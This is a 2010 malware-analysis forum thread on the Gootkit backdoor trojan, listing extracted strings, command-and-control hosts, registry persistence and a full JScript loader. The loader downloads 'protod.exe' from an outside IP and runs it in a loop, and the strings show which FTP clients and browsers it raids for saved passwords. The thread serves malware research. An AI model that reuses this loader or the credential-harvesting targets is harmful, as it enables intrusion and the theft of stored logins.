A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #1254  by EP_X0FF
 Tue Jun 08, 2010 2:36 pm
Russian origin (probably) backdoor trojan.

Dropper VT result

http://www.virustotal.com/analisis/08e8 ... 1276006713

Container with malicious payload dll inside.

Spawns svchost.exe copy with GootkitSSO (see below) component loaded as library.
Downloads additional component, stores it in %temp% directory and then executes from svchost.

Extracted executable VT result
http://www.virustotal.com/analisis/e8fc ... 1276006850
Code: Select all
Mutant
\\.\PrepetiumVirta
POST %s HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en)
Host: %s
Accept: text/html
Connection: Keep-Alive
Content-Length: %d
Content-Type: multipart/form-data; boundary=%s
Content-Disposition: form-data; name="data"
----------XEqOcMUhJz1uu5ZoHVzpHt
**RetCode:
Gootkit ldr 4
GET
%d%d%d.exe
heathen.cc
v00d00.org
ru7noh8quoob8moh.com
taishous4nohshiy.com
oyah9eeshacei2ae.com
SYSTEM\
Randseed_1
Randseed_2
SYSTEM\
Randseed_1
Randseed_2
Software\Microsoft\Windows\CurrentVersion\Group Policy Objects
SetIEPolicy: break
http://www.vedomosti.ru/
Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\%s\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
[nothing]
@xh$\\?\globalroot\systemroot\system32\drivers\vitra.sys
\SystemRoot\System32\drivers\vitra.sys
BPSitelist
Port
Password
Login
SiteAddress
Site%d
NumEntries
Main
Software\BPFTP\Bullet Proof FTP\
Software\BPFTP
InstallDir1
Software\BulletProof Software\BulletProof FTP Client\Options
Software\BPFTP\Bullet Proof FTP\Options
SitesDir
Software\BulletProof Software\BulletProof FTP Client\Main
Software\BPFTP\Bullet Proof FTP\Main
LastSessionFile
robert249fsd)af8.?sf2eaya;sd$%85034gsn%@#!afsgsjdg;iawe;otigkbarr
Hostname
Username
Software\CoffeeCup Software\Internet\Profiles
hdfzpysvpzimorhk
User
Host
Software\FTPWare\COREFTP\Sites
CryptUnprotectData
crypt32.dll
smdata.dat
tree.dat
sm.dat
\GlobalSCAPE\CuteFTP Pro\
\GlobalSCAPE\CuteFTP\
SOFTWARE\Microsoft\Windows\ShellNoRoam\MUICache
cuteftppro.exe
cutftp32.exe
HostName
Software\Far\SavedDialogHistory\FTPHost
Software\Far\Plugins\FTP\Hosts
HostAdrs
UserName
Software\Sota\FFFTP\Options
Pass
Server
Servers
FileZilla3
\FileZilla\sitemanager.xml
yA36zA48dEhfrvghGRg57h5UlDv3
\History.dat
\Quick.dat
\Sites.dat
DataFolder
Software\FlashFXP\3
Install Path
Software\FlashFXP
path
\FlashFXP\3
Item
Ftp
\Frigate3\FtpSite.XML
FTP Commander Deluxe
FTP Commander
FTP Navigator
FTP Commander Pro
anonymous
ftplist.txt
UninstallString
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
Software\FTP Explorer\Profiles
v00d00.org/put_accs.dll
\FTPRush\RushSite.xml
rh$M
rh$D
rh$B
rh$Val
rh$ForceRemove
sh$NoRemove
sh$Delete
sh$AppID
CLSID
Component Categories
FileType
Interface
Hardware
Mime
SAM
SECURITY
SYSTEM
Software
TypeLib
\signons3.txt
\signons2.txt
\signons.txt
Install Directory
\Main
Software\Mozilla\Mozilla Firefox
Path
Profile0
IsRelative
profiles.ini
\Mozilla\Firefox\
SECITEM_FreeItem
PK11_FreeSlot
NSS_Shutdown
PK11SDR_Decrypt
PK11_Authenticate
PK11_GetInternalKeySlot
NSSBase64_DecodeBuffer
NSS_Init
nss3.dll
softokn3.dll
plds4.dll
plc4.dll
nspr4.dll
http
Log profile
\Opera
\profile\wand.dat
Software\Opera Software
Last Directory3
kDPAPI: 
MS IE FTP Passwords
WininetCacheCredentials
https://
http://
ftp://
:StringData
internet explorer
PStoreCreateInstance
pstorec.dll
Software\Microsoft\Internet Explorer\IntelliForms\Storage2
abe2869f-9b47-4cd9-a358-c22904dba7f7
D:"Transfer Port"
S:"Password"
S:"Username"
S:"Hostname"
\Sessions
Software\VanDyke\SecureFX
Config Path
\VanDyke\Config\Sessions
FavoriteItem
\SmartFTP\Client 2.0\Favorites
#text
InstallDir
Software\Ghisler\Total Commander
Software\Ghisler\Windows Commander
password
username
host
connections
\wcx_ftp.ini
[/quote]

and more strings.

Set dll in registry with help of [b]HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad[/b] key as [b]GootkitSSO[/b].

[url]http://www.virustotal.com/analisis/7b4fa216a467b10159cd08fe7bcc6a8a00990fd08204de01a1ff2838c60d8ae0-1276007178[/url]

Dll also contains few strings.

Gtk1 process keeps connection with 

78.140.15.82:1863 and 443 (https)
27.152.135.79:3129 (which is belongs to IP-addresses affiliated with control panel of[b] Eleonore Exploits[/b] pack)

Named Gootkit because of numerous strings inside and mutex [quote]\BaseNamedObjects\gootkit[/quote]

Produces debug output (after reboot)
[quote]Script Entry() 
start thread for 'hxxp://78.140.15.82/quu3aiVai7Lei6epha7azoYegah4da9za2rec8ahngoosu7tuneemoizee5vael5eBoazahHephaahohTa3eecoochaiseesheichoh7aikuz0uas8zeekiaChiayeVa/scripts/thread1.script'
thread1 Entry()[/quote]

Script below
[quote]//#JScript
PrintValue("thread1 Entry()");
//**********************************************************************
//  BASIC Variables,
//  Do not remove.
//**********************************************************************
var FILE_ATTRIBUTE_DIRECTORY=0x00000010,
	FILE_ATTRIBUTE_READONLY=0x00000001,  
	FILE_ATTRIBUTE_HIDDEN=0x00000002,
	FILE_ATTRIBUTE_SYSTEM=0x00000004,  
	FILE_ATTRIBUTE_DIRECTORY=0x00000010,  
	FILE_ATTRIBUTE_ARCHIVE=0x00000020,  
	FILE_ATTRIBUTE_DEVICE=0x00000040,  
	FILE_ATTRIBUTE_NORMAL=0x00000080,  
	FILE_ATTRIBUTE_TEMPORARY=0x00000100,  
	FILE_ATTRIBUTE_SPARSE_FILE=0x00000200,  
	FILE_ATTRIBUTE_REPARSE_POINT=0x00000400,  
	FILE_ATTRIBUTE_COMPRESSED=0x00000800,  
	FILE_ATTRIBUTE_OFFLINE=0x00001000,  
	FILE_ATTRIBUTE_NOT_CONTENT_INDEXED=0x00002000,  
	FILE_ATTRIBUTE_ENCRYPTED=0x00004000,  
	FILE_ATTRIBUTE_VIRTUAL=0x00010000;  

var RESUME_PROCESS_THREADS = 1,
    SUSPEND_PROCESS_THREADS = 0;

var DEBUG_PRIVELEGES_ENABLED = 1,
    DEBUG_PRIVELEGES_DISABLED = 0;

var IE_WAIT_FOR_PAGE = 1,
    IE__DONT_WAIT_FOR_PAGE = 0;

var IPPROTO_IP = 0,
    IPPROTO_ICMP = 1,
    IPPROTO_TCP = 6,
    IPPROTO_PUP = 12,
    IPPROTO_UDP = 17,
    IPPROTO_IDP = 22,
    IPPROTO_ND = 77;

var HKEY_CLASSES_ROOT = 0,
    HKEY_CURRENT_USER = 1,
    HKEY_LOCAL_MACHINE = 2,
    HKEY_USERS = 3,
    HKEY_PERFORMANCE_DATA = 4,
    HKEY_PERFORMANCE_TEXT = 5,
    HKEY_PERFORMANCE_NLSTEXT = 6,
    HKEY_CURRENT_CONFIG = 7,
    HKEY_DYN_DATA = 8,
    HKEY_CURRENT_USER_LOCAL_SETTINGS = 9;

var REG_SZ = 1,
    REG_EXPAND_SZ = 2,
    REG_DWORD = 4,
    REG_DWORD_BIG_ENDIAN = 5;

var WAIT_INFINITI = -1;
var OpenFileForReading = 1, OpenFileForWriting = 2, OpenFileForAppending = 8;
var TristateUseDefault = -2, TristateTrue = -1, TristateFalse = 0;

//**********************************************************************
//  BASIC Functions,
//  Do not remove.
//**********************************************************************
function isInt(x) {
    var y=parseInt(x);
    if (isNaN(y)) return false;
    return x==y && x.toString()==y.toString();
}

function strpos( haystack, needle, offset) {
   if(offset) offset = offset ; 
   else offset = 0 ; 
   return haystack.indexOf(needle, offset); 
}

function stristr (haystack, needle, bool) {
    var pos = 0;
 
    haystack += '';
    pos = haystack.toLowerCase().indexOf( (needle+'').toLowerCase() );
    if (pos == -1){
        return false;
    } else{
        if (bool) {
            return haystack.substr( 0, pos );
        } else{
            return haystack.slice( pos );
        }
    }
}

function ProcessCreatedCallback(pid, path, cmdline, waitorno){
}

while(true){
	var tempfile = wapi_GetTempFileName();

	var xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");
	
	xmlhttp.open("GET", "hxxp://78.140.15.82/protod.exe", false);
	xmlhttp.send();
	
	if(xmlhttp.status == 200){
		var stream = new ActiveXObject("ADODB.Stream");
		stream.Type = 1;
		stream.Open();
		stream.Write(xmlhttp.responseBody);
		stream.Flush();
		stream.Position = 0;
		stream.SaveToFile(tempfile, 2);
		stream.Close();
		delete stream;
		calcpid = papi_ExecCommandLine(tempfile, "", IE_WAIT_FOR_PAGE, "ProcessCreatedCallback");
	}
	
	delete xmlhttp;
	wapi_Sleep(5000);
}

PrintValue("thread1 End()");

Protod.exe attached in gtk1.rar
Attachments
pass: malware
(17.42 KiB) Downloaded 97 times
pass: malware
(49.64 KiB) Downloaded 103 times
pass malware
(89.67 KiB) Downloaded 112 times
 #1302  by NOP
 Sun Jun 20, 2010 11:15 am
Gootkit v2.1

SYS(packed) strings:
Gootkit v2.1
Fuck you, dumper :\
\SystemRoot\system32\kernel32.dll
\SystemRoot\system32\ntdll.dll
rk.sys
DllEntryPoint
Attachments
Password: infected
(236.62 KiB) Downloaded 110 times
 #1358  by Evilcry
 Tue Jun 29, 2010 7:20 am
Hi,

Due to heavy number of screenshots, I attach the direct link to Backdoor Gootkit Reverse Engineering of Dropper- KMode Driver and Network Analysis #1

http://evilcodecave.blogspot.com/2010/0 ... ng-of.html

Soon I'll publish the Secondo Episode, in attachment the malicious dll carved put from TCP Stream.


Have a nice Day,
Giuseppe 'Evilcry' Bonfa
Attachments
Pwd: malware
(76.77 KiB) Downloaded 93 times